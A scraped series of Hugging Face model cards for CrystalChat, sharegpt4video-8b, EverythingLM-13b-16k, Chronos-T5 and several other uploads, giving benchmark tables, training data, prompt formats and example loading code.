type: accuracy
value: 70.328
- task:
type: question-answering
dataset:
type: ai2_arc
name: ARC (Challenge)
metrics:
- name: Accuracy (25-shot)
type: accuracy
value: 51.706
- name: Accuracy (0-shot)
type: accuracy
value: 44.625
- task:
type: text-generation
dataset:
type: gsm8k
name: GSM8K (Grade School Math 8K)
metrics:
- name: Accuracy (5 shot)
type: accuracy
value: 28.052
---
# CrystalChat
We present CrystalChat, an instruction-following model fine-tuned from [LLM360/CrystalCoder](https://huggingface.co/LLM360/CrystalCoder).
CrystalChat pushes the Llama 2 frontier for models excelling at both language and coding tasks.
# CrystalChat Performance
| Model | Trained Tokens | Avg. of Avg. | Language Avg. | Coding Avg. |
|------------------------|--------------|------------|-------------|-----------|
| CrystalChat 7B | 1.275T | 44.96 | 53.29 | 36.62 |
| Mistral-7B-Instruct-v0.1 | - | 44.34 | 54.86 | 30.62 |
| CodeLlama-7b-Instruct | 2.5T | 40.91 | 45.29 | 36.52 |
| Llama-2-7b-Chat | 2T | 34.11 | 52.86 | 15.35 |
| AmberChat 7B | 1.25T | - | 44.76 | - |
| Model | Trained Tokens | ARC | HellaSwag | MMLU (5-shot) | GSM8K | Winogrande(5-shot) | TruthfulQA | HumanEval (pass@1) | MBPP (pass@1) |
|------------------------|--------------|------------|-------------|-----------|-----|---------|-------------|-----|------------------|
| CrystalChat 7B | 1.275T | 51.71 | 76.12 | 53.22 | 28.05 | 70.64 | 47.29 | 34.12 | 39.11 |
| Mistral-7B-Instruct-v0.1 | - | 58.05 | 75.71 | 55.56 | 32.00 | 74.27 | 55.90 | 29.27 | 31.96 |
| CodeLlama-7b-Instruct | 2.5T | 43.35 | 66.14 | 42.75 | 15.92 | 64.33 | 39.23 | 34.12 | 38.91 |
| Llama-2-7b-Chat | 2T | 53.07 | 78.39 | 48.42 | 18.88 | 73.09 | 45.30 | 13.26 | 17.43 |
| AmberChat 7B | 1.25T | 42.83 | 74.03 | 38.88 | 5.31 | 66.77 | 40.72 | - | - |
| Combined Language and Coding Ability |
|------------------------------------------------|
<img src="CC-Compare.jpg" alt="arc" width="800"/>
| Performance on Standard Benchmarks |
|------------------------------------------------|
<img src="cc-eval-std-benchmarks.png" alt="std-bench" width="800"/>
| Performance on Language Benchmarks |
|---------------------------------------------------------|
<img src="cc-eval-lang-compare.png" alt="arc" width="800"/>
# Instruction Tuning Training
**CrystalChat** uses the last **CrystalCoder** checkpoint of phase2 ([CrystalCoder_phase2_checkpoint_214387](https://huggingface.co/LLM360/CrystalCoder/tree/CrystalCoder_phase2_checkpoint_214387)) as its initialization checkpoint. We then finetuned the model using the dataset described below.
We also performed the same finetuning on the last **CrystalCoder** checkpoint of phase3 ([CrystalCoder_phase3_checkpoint_027728](https://huggingface.co/LLM360/CrystalCoder/tree/CrystalCoder_phase3_checkpoint_027728)). The phase2 and phase3 finetuning results are very similar, but the phase2 finetuning exhibits slightly better performance on the English language benchmarks, so we chose the phase2 finetuning result as the final model for **CrystalChat**.
# Instruction Tuning Data
The fine-tuning data is a mix of publicly available language and code datasets, plus an originally created dataset called **WebAlpaca** covering HTML coding instructions.
The WebAlpaca dataset was created by us and is used as part of our instruction tuning training data. We will release the WebAlpaca dataset in a separate repository soon.
The summary of the fine-tuning data is as follows:
<!-- <center><img src="data_table.jpg" alt="Instruction Data"/></center> -->
| Subset | #Tokens | Avg. #Q | Avg. Query Len | Avg. #R | Avg. Reply Len |
| ----------- | ----------- |----------- |----------- |----------- |----------- |
| [OASST1-guanaco](https://huggingface.co/datasets/openaccess-ai-collective/oasst1-guanaco-extended-sharegpt) | 4,464,640 | 1.36 | 38.28 | 1.36 | 271.69 |
| [SlimOrca](https://huggingface.co/datasets/Open-Orca/SlimOrca) |225,628,160 | 1.00 | 259.16 | 1.00 | 151.12 |
| [ShareGPT](https://huggingface.co/datasets/Aeala/ShareGPT_Vicuna_unfiltered) | 112,914,432 | 3.28 | 94.53 | 3.64 | 365.81 |
| [Evol-ShareGPT](https://huggingface.co/datasets/WizardLM/WizardLM_evol_instruct_V2_196k) | 85,954,560 | 1.00 | 145.99 | 1.00 | 425.17 |
| [ChatLogs](https://huggingface.co/datasets/winglian/chatlogs-en-cleaned) | 29,337,600 | 3.39 | 95.58 | 3.24 | 191.42 |
| [CodeAlpaca](https://huggingface.co/datasets/lucasmccabe-lmi/CodeAlpaca-20k) | 2,623,488 | 1.00 | 32.46 | 1.00 | 67.68 |
| [Rosetta Code](https://github.com/sahil280114/codealpaca/blob/master/data/rosetta_alpaca.json) | 7,987,200 | 1.00 | 450.09 | 1.00 | 533.52 |
| [Evol-CodeAlpaca 1](https://huggingface.co/datasets/theblackcat102/evol-codealpaca-v1) | 73,803,776 | 1.00 | 210.33 | 1.00 | 437.92 |
| [Evol-CodeAlpaca 2](https://huggingface.co/datasets/nickrosh/Evol-Instruct-Code-80k-v1) | 34,910,208 | 1.00 | 114.99 | 1.00 | 300.29 |
| WebAlpaca | 43,673,600 | 1.00 | 96.29 | 1.00 | 746.52 |
| [General Textbooks](https://huggingface.co/datasets/open-phi/textbooks) | 85,590,016 | Not instruction data
| [Programming Books](https://huggingface.co/datasets/open-phi/programming_books_llama) | 395,628,544 | Not instruction data
| Total | 1,102,516,224
For more details, check out the [data table](https://huggingface.co/LLM360/CrystalChat/blob/main/data_table.jpg).
# Instruction Format
We've added some new special tokens to the CrystalCoder tokenizer to support the instruction tuning.
The special tokens used in the instruction tuning are listed below:
```
bos: <s>
eos: </s>
system_start: <|sys_start|>
system_end: <|sys_end|>
user_start: <|im_start|>
user_end: <|im_end|>
```
The instruction format is as follows:
```
<s> <|sys_start|> system prompt <|sys_end|> <|im_start|> first user utterance <|im_end|> first model response <|im_start|> next user utterance <|im_end|> next model response </s>
```
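For illustration, here is a minimal sketch of assembling a prompt string in this format; the helper and variable names are our own and not part of the released code.
```python
# Minimal sketch: build a CrystalChat prompt from a system prompt and a list of
# (user, assistant) turns using the special tokens listed above. The final
# assistant reply is left for the model to generate; it will end with </s>.
def build_crystalchat_prompt(system_prompt, turns):
    prompt = f"<s> <|sys_start|> {system_prompt} <|sys_end|>"
    for user, reply in turns:
        prompt += f" <|im_start|> {user} <|im_end|>"
        if reply is not None:
            prompt += f" {reply}"
    return prompt

print(build_crystalchat_prompt(
    "You are an AI assistant.",
    [("Give me a one-sentence description of crystal.", None)],
))
```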
# Reproducing the Results
We will release the training code and the training data soon. Our training code is based on [Megatron-LM](https://github.com/NVIDIA/Megatron-LM), with some modifications to support our training data format and Maximal Update Parametrization (μP).
## Model Description
- **Model type:** Language model with the same architecture as LLaMA-7B
- **Language(s) (NLP):** English
- **License:** Apache 2.0
- **Resources for more information:**
- [Training Code](https://github.com/LLM360/crystalcoder-train)
- [Data Preparation](https://github.com/LLM360/crystalcoder-data-prep)
- [Metrics](https://github.com/LLM360/Analysis360)
- [Fully processed CrystalCoder pretraining data](https://huggingface.co/datasets/LLM360/CrystalCoderDatasets)
# Loading CrystalChat
```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer
device = "cuda:0" if torch.cuda.is_available() else "cpu"
tokenizer = AutoTokenizer.from_pretrained("LLM360/CrystalChat", trust_remote_code=True)
model = AutoModelForCausalLM.from_pretrained("LLM360/CrystalChat", trust_remote_code=True).to(device)
prompt = '<s> <|sys_start|> You are an AI assistant. You will be given a task. You must generate a detailed and long answer. <|sys_end|> <|im_start|> Write a python function that takes a list of integers and returns the squared sum of the list. <|im_end|>'
input_ids = tokenizer(prompt, return_tensors="pt").input_ids.to(device)
gen_tokens = model.generate(input_ids, do_sample=True, max_length=400)
print("-"*20 + "Output for model" + 20 * '-')
print(tokenizer.batch_decode(gen_tokens)[0])
```
Response:
````
Here's a Python function named `squared_sum_list` that takes a list of integers as input and returns the squared sum of the list:
```python
def squared_sum_list(lst):
return sum([num ** 2 for num in lst])
```
The function `squared_sum_list` uses a list comprehension to iterate over each number in the input list `lst` and calculate its square. Then, it uses the `sum` function to accumulate all the squared numbers in a single value - the squared sum of the list.
For example:
```python
numbers = [1, 2, 3, 4, 5]
print(squared_sum_list(numbers)) # Outputs: 55
```
In the above code, the list `[1, 2, 3, 4, 5]` is passed as an argument to the `squared_sum_list` function. The function calculates the sum of the squares of the elements in the list, which is `1 + 4 + 9 + 16 + 25 = 55`. The function then returns this result, which is printed to the console.</s>
````
Another chat example:
```python
# ...
prompt = '<s> <|sys_start|> You are an AI assistant. You will be given a task. You must generate a detailed \
and long answer. <|sys_end|> <|im_start|> Give me a one-sentence description of crystal. And tell me what \
might the name "Crystal" mean for a transparent and open-source language model? <|im_end|>'
# ...
```
Response:
```
A crystal is an ordered, hexagonal lattice of atoms that displays a unique crystal structure resulting in transparency and diverse physical and chemical properties, and as a transparent and open-source language model, "Crystal" might represent transparency and accessibility by enabling users to understand the inner workings of the model.</s>
```
# Bias, Risks, and Limitations
CrystalChat has not been aligned to human preferences for safety within the RLHF phase or deployed with in-the-loop filtering of responses like ChatGPT, so the model can produce problematic outputs (especially when prompted to do so). The training data is known and made available [here](https://huggingface.co/datasets/LLM360/CrystalCoderDatasets). It primarily consists of the SlimPajama, StarCoder, and WebCrawl datasets.
# Citation
**BibTeX:**
```bibtex
@misc{liu2023llm360,
title={LLM360: Towards Fully Transparent Open-Source LLMs},
author={Zhengzhong Liu and Aurick Qiao and Willie Neiswanger and Hongyi Wang and Bowen Tan and Tianhua Tao and Junbo Li and Yuqi Wang and Suqi Sun and Omkar Pangarkar and Richard Fan and Yi Gu and Victor Miller and Yonghao Zhuang and Guowei He and Haonan Li and Fajri Koto and Liping Tang and Nikhil Ranjan and Zhiqiang Shen and Xuguang Ren and Roberto Iriondo and Cun Mu and Zhiting Hu and Mark Schulze and Preslav Nakov and Tim Baldwin and Eric P. Xing},
year={2023},
eprint={2312.06550},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
## About LLM360
LLM360 is an initiative for comprehensive and fully open-sourced LLMs,
where all training details, model checkpoints, intermediate results, and
additional analyses are made available to the community. Our goal is to advance
the field by inviting the community to deepen the understanding of LLMs
together. As the first step of the project LLM360, we release all intermediate
model checkpoints, our fully-prepared pre-training dataset, all source code and
configurations, and training details. We are
committed to continually pushing the boundaries of LLMs through this open-source
effort.
[Visit Us](https://www.llm360.ai/) |
Lin-Chen/sharegpt4video-8b | Lin-Chen | "2024-07-01T17:53:43Z" | 3,578 | 24 | transformers | [
"transformers",
"safetensors",
"llava_llama",
"text-generation",
"visual-question-answering",
"dataset:Lin-Chen/ShareGPT4V",
"dataset:ShareGPT4Video/ShareGPT4Video",
"arxiv:2406.04325",
"license:apache-2.0",
"autotrain_compatible",
"region:us"
] | visual-question-answering | "2024-05-26T17:42:40Z" | ---
license: apache-2.0
inference: false
datasets:
- Lin-Chen/ShareGPT4V
- ShareGPT4Video/ShareGPT4Video
pipeline_tag: visual-question-answering
---
<br>
<br>
# sharegpt4video-8b Model Card
## Model details
**Model type:**
sharegpt4video-8b is an open-source video chatbot trained by fine-tuning the entire model on open-source [video instruction data](https://huggingface.co/datasets/ShareGPT4Video/ShareGPT4Video). The training process took around 5 hours on 32xA100 GPUs.
**Model date:**
sharegpt4video-8b was trained in May 2024.
**Paper or resources for more information:**
[[Code](https://github.com/ShareGPT4Omni/ShareGPT4Video)] [[Project Page](https://sharegpt4video.github.io/)]
## Usage
You can utilize this model as we provide in our [[repository](https://github.com/ShareGPT4Omni/ShareGPT4Video)].
## Training dataset
All training data is open-sourced; usage details can be found in our [repository](https://github.com/ShareGPT4Omni/ShareGPT4Video).
- 153K collection of various video instruction data
- 28K high-quality video caption data from [[ShareGPT4Video](https://huggingface.co/datasets/ShareGPT4Video/ShareGPT4Video)]
## Intended use
**Primary intended uses:**
The primary use of sharegpt4video-8b is research on large video-language models and video chatbots.
**Primary intended users:**
The primary intended users of the model are researchers and hobbyists in computer vision, natural language processing, machine learning, and artificial intelligence.
## Paper
arxiv.org/abs/2406.04325
|
manishaaaaa/model | manishaaaaa | "2024-06-28T07:01:20Z" | 3,578 | 0 | transformers | [
"transformers",
"safetensors",
"gguf",
"llama",
"text-generation-inference",
"unsloth",
"trl",
"en",
"base_model:unsloth/llama-3-8b-Instruct-bnb-4bit",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | "2024-06-28T05:11:44Z" | ---
base_model: unsloth/llama-3-8b-Instruct-bnb-4bit
language:
- en
license: apache-2.0
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
---
# Uploaded model
- **Developed by:** manishaaaaa
- **License:** apache-2.0
- **Finetuned from model :** unsloth/llama-3-8b-Instruct-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
totally-not-an-llm/EverythingLM-13b-16k | totally-not-an-llm | "2024-04-23T23:31:32Z" | 3,577 | 33 | transformers | [
"transformers",
"pytorch",
"llama",
"text-generation",
"dataset:totally-not-an-llm/EverythingLM-data",
"license:llama2",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-08-12T07:00:47Z" | ---
license: llama2
datasets:
- totally-not-an-llm/EverythingLM-data
---
# EverythingLM-13b-16k
Introducing EverythingLM, a llama-2 based, general-purpose 13b model with 16k context thanks to LlongMa. The model is trained on the EverythingLM dataset, more info can be found on the dataset page.
The model is completely uncensored.
This model is an early test of the EverythingLM dataset and some new experimental principles, so don't consider it SOTA.
### GGML quants:
https://huggingface.co/TheBloke/EverythingLM-13B-16K-GGML
Make sure to use correct rope scaling settings:
`-c 16384 --rope-freq-base 10000 --rope-freq-scale 0.25`
### GPTQ quants:
https://huggingface.co/TheBloke/EverythingLM-13B-16K-GPTQ
### Notable features:
- Automatically triggered CoT reasoning.
- Verbose and detailed replies.
- Creative stories.
- Better prompt understanding.
### Prompt format:
It is a modified Vicuna format, the same used in many of ehartford's models.
```
You are a helpful AI assistant.
USER: <prompt>
ASSISTANT:
```
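For convenience, here is a minimal sketch that assembles a prompt in this format; the function name and example prompt are illustrative only, and the exact whitespace may need tweaking to match your front end.
```python
# Minimal sketch: build an EverythingLM prompt in the modified Vicuna format
# shown above. The function name and example prompt are illustrative.
def build_everythinglm_prompt(user_prompt, system_prompt="You are a helpful AI assistant."):
    return f"{system_prompt}\n\nUSER: {user_prompt}\nASSISTANT:"

print(build_everythinglm_prompt("Write a short story about a lighthouse keeper."))
```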
Training took about 1 hour using QLoRa on 1xA100, so this model can be recreated for about $3. QLoRa model can be found here: https://huggingface.co/totally-not-an-llm/EverythingLM-13b-peft.
### Model quirks:
- Due to the nature of the dataset, it does better with more detail. I've found it gives much better stories when I provide more requirements.
- It really likes to use numbered lists. I don't necessarily have a problem with this, but it's something to note when training on the dataset.
- It likes to write fairy tales over anything else, which is strange. This can easily be fixed by prompting.
- Occasionally it will fall into repetition; this seems to be a common issue with llama-2 models.
- Haven't tested pushing it all the way to 16k context.
### Future plans:
- Native finetune.
- Other model sizes.
- Improve dataset by:
- Regenerating using gpt-4.
- A bit more data with more diversity.
- Refactor dataset generation script.
- Test some model merges using this model.
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_totally-not-an-llm__EverythingLM-13b-16k)
| Metric | Value |
|-----------------------|---------------------------|
| Avg. | 45.7 |
| ARC (25-shot) | 56.57 |
| HellaSwag (10-shot) | 80.58 |
| MMLU (5-shot) | 50.18 |
| TruthfulQA (0-shot) | 47.46 |
| Winogrande (5-shot) | 72.77 |
| GSM8K (5-shot) | 6.44 |
| DROP (3-shot) | 5.89 |
|
autogluon/chronos-t5-small | autogluon | "2024-05-13T21:08:16Z" | 3,577 | 1 | transformers | [
"transformers",
"safetensors",
"t5",
"text2text-generation",
"time series",
"forecasting",
"pretrained models",
"foundation models",
"time series foundation models",
"time-series",
"time-series-forecasting",
"arxiv:2403.07815",
"arxiv:1910.10683",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | time-series-forecasting | "2024-05-14T15:55:51Z" | ---
license: apache-2.0
pipeline_tag: time-series-forecasting
tags:
- time series
- forecasting
- pretrained models
- foundation models
- time series foundation models
- time-series
---
# Chronos-T5 (Small)
Chronos is a family of **pretrained time series forecasting models** based on language model architectures. A time series is transformed into a sequence of tokens via scaling and quantization, and a language model is trained on these tokens using the cross-entropy loss. Once trained, probabilistic forecasts are obtained by sampling multiple future trajectories given the historical context. Chronos models have been trained on a large corpus of publicly available time series data, as well as synthetic data generated using Gaussian processes.
For details on Chronos models, training data and procedures, and experimental results, please refer to the paper [Chronos: Learning the Language of Time Series](https://arxiv.org/abs/2403.07815).
<p align="center">
<img src="figures/main-figure.png" width="100%">
<br />
<span>
Fig. 1: High-level depiction of Chronos. (<b>Left</b>) The input time series is scaled and quantized to obtain a sequence of tokens. (<b>Center</b>) The tokens are fed into a language model which may either be an encoder-decoder or a decoder-only model. The model is trained using the cross-entropy loss. (<b>Right</b>) During inference, we autoregressively sample tokens from the model and map them back to numerical values. Multiple trajectories are sampled to obtain a predictive distribution.
</span>
</p>
---
## Architecture
The models in this repository are based on the [T5 architecture](https://arxiv.org/abs/1910.10683). The only difference is in the vocabulary size: Chronos-T5 models use 4096 different tokens, compared to 32128 of the original T5 models, resulting in fewer parameters.
| Model | Parameters | Based on |
| ---------------------------------------------------------------------- | ---------- | ---------------------------------------------------------------------- |
| [**chronos-t5-tiny**](https://huggingface.co/amazon/chronos-t5-tiny) | 8M | [t5-efficient-tiny](https://huggingface.co/google/t5-efficient-tiny) |
| [**chronos-t5-mini**](https://huggingface.co/amazon/chronos-t5-mini) | 20M | [t5-efficient-mini](https://huggingface.co/google/t5-efficient-mini) |
| [**chronos-t5-small**](https://huggingface.co/amazon/chronos-t5-small) | 46M | [t5-efficient-small](https://huggingface.co/google/t5-efficient-small) |
| [**chronos-t5-base**](https://huggingface.co/amazon/chronos-t5-base) | 200M | [t5-efficient-base](https://huggingface.co/google/t5-efficient-base) |
| [**chronos-t5-large**](https://huggingface.co/amazon/chronos-t5-large) | 710M | [t5-efficient-large](https://huggingface.co/google/t5-efficient-large) |
## Usage
To perform inference with Chronos models, install the package from the GitHub [companion repo](https://github.com/amazon-science/chronos-forecasting) by running:
```
pip install git+https://github.com/amazon-science/chronos-forecasting.git
```
A minimal example showing how to perform inference using Chronos models:
```python
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import torch
from chronos import ChronosPipeline
pipeline = ChronosPipeline.from_pretrained(
"amazon/chronos-t5-small",
device_map="cuda",
torch_dtype=torch.bfloat16,
)
df = pd.read_csv("https://raw.githubusercontent.com/AileenNielsen/TimeSeriesAnalysisWithPython/master/data/AirPassengers.csv")
# context must be either a 1D tensor, a list of 1D tensors,
# or a left-padded 2D tensor with batch as the first dimension
context = torch.tensor(df["#Passengers"])
prediction_length = 12
forecast = pipeline.predict(context, prediction_length) # shape [num_series, num_samples, prediction_length]
# visualize the forecast
forecast_index = range(len(df), len(df) + prediction_length)
low, median, high = np.quantile(forecast[0].numpy(), [0.1, 0.5, 0.9], axis=0)
plt.figure(figsize=(8, 4))
plt.plot(df["#Passengers"], color="royalblue", label="historical data")
plt.plot(forecast_index, median, color="tomato", label="median forecast")
plt.fill_between(forecast_index, low, high, color="tomato", alpha=0.3, label="80% prediction interval")
plt.legend()
plt.grid()
plt.show()
```
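Since `context` may also be a list of 1D tensors (as noted in the comment above), several series can be forecast in one call. A brief sketch continuing the example above (reusing `torch`, `df`, `pipeline`, and `prediction_length`); the slicing is illustrative only.
```python
# Minimal sketch: batched forecasting by passing a list of 1D tensors.
# Continues the example above; the output should have shape
# [num_series, num_samples, prediction_length].
contexts = [
    torch.tensor(df["#Passengers"][: len(df) // 2].values),  # first half of the series
    torch.tensor(df["#Passengers"].values),                  # full series
]
forecasts = pipeline.predict(contexts, prediction_length)
print(forecasts.shape)
```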
## Citation
If you find Chronos models useful for your research, please consider citing the associated [paper](https://arxiv.org/abs/2403.07815):
```
@article{ansari2024chronos,
author = {Ansari, Abdul Fatir and Stella, Lorenzo and Turkmen, Caner and Zhang, Xiyuan, and Mercado, Pedro and Shen, Huibin and Shchur, Oleksandr and Rangapuram, Syama Syndar and Pineda Arango, Sebastian and Kapoor, Shubham and Zschiegner, Jasper and Maddix, Danielle C. and Mahoney, Michael W. and Torkkola, Kari and Gordon Wilson, Andrew and Bohlke-Schneider, Michael and Wang, Yuyang},
title = {Chronos: Learning the Language of Time Series},
journal = {arXiv preprint arXiv:2403.07815},
year = {2024}
}
```
## Security
See [CONTRIBUTING](CONTRIBUTING.md#security-issue-notifications) for more information.
## License
This project is licensed under the Apache-2.0 License.
|
Niggendar/duchaitenPonyXLNo_v35 | Niggendar | "2024-05-24T10:56:45Z" | 3,577 | 2 | diffusers | [
"diffusers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"diffusers:StableDiffusionXLPipeline",
"region:us"
] | text-to-image | "2024-05-24T10:49:20Z" | ---
library_name: diffusers
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🧨 diffusers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
mradermacher/NOVA-1.5B-Instruct-2-GGUF | mradermacher | "2024-06-30T18:52:49Z" | 3,574 | 0 | transformers | [
"transformers",
"gguf",
"en",
"base_model:VAIBHAV22334455/NOVA-1.5B-Instruct-2",
"endpoints_compatible",
"region:us"
] | null | "2024-06-30T18:47:04Z" | ---
base_model: VAIBHAV22334455/NOVA-1.5B-Instruct-2
language:
- en
library_name: transformers
quantized_by: mradermacher
tags: []
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/VAIBHAV22334455/NOVA-1.5B-Instruct-2
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q2_K.gguf) | Q2_K | 0.8 | |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.IQ3_XS.gguf) | IQ3_XS | 0.8 | |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q3_K_S.gguf) | Q3_K_S | 0.9 | |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.IQ3_S.gguf) | IQ3_S | 0.9 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.IQ3_M.gguf) | IQ3_M | 0.9 | |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q3_K_M.gguf) | Q3_K_M | 0.9 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q3_K_L.gguf) | Q3_K_L | 1.0 | |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.IQ4_XS.gguf) | IQ4_XS | 1.0 | |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q4_K_S.gguf) | Q4_K_S | 1.0 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q4_K_M.gguf) | Q4_K_M | 1.1 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q5_K_S.gguf) | Q5_K_S | 1.2 | |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q5_K_M.gguf) | Q5_K_M | 1.2 | |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q6_K.gguf) | Q6_K | 1.4 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q8_0.gguf) | Q8_0 | 1.7 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.f16.gguf) | f16 | 3.2 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
mradermacher/H4rmoniousAnthea_V.2-GGUF | mradermacher | "2024-06-03T06:46:21Z" | 3,573 | 0 | transformers | [
"transformers",
"gguf",
"en",
"base_model:neovalle/H4rmoniousAnthea_V.2",
"endpoints_compatible",
"region:us"
] | null | "2024-06-03T05:10:07Z" | ---
base_model: neovalle/H4rmoniousAnthea_V.2
language:
- en
library_name: transformers
quantized_by: mradermacher
tags: []
---
## About
<!-- ### quantize_version: 2 -->
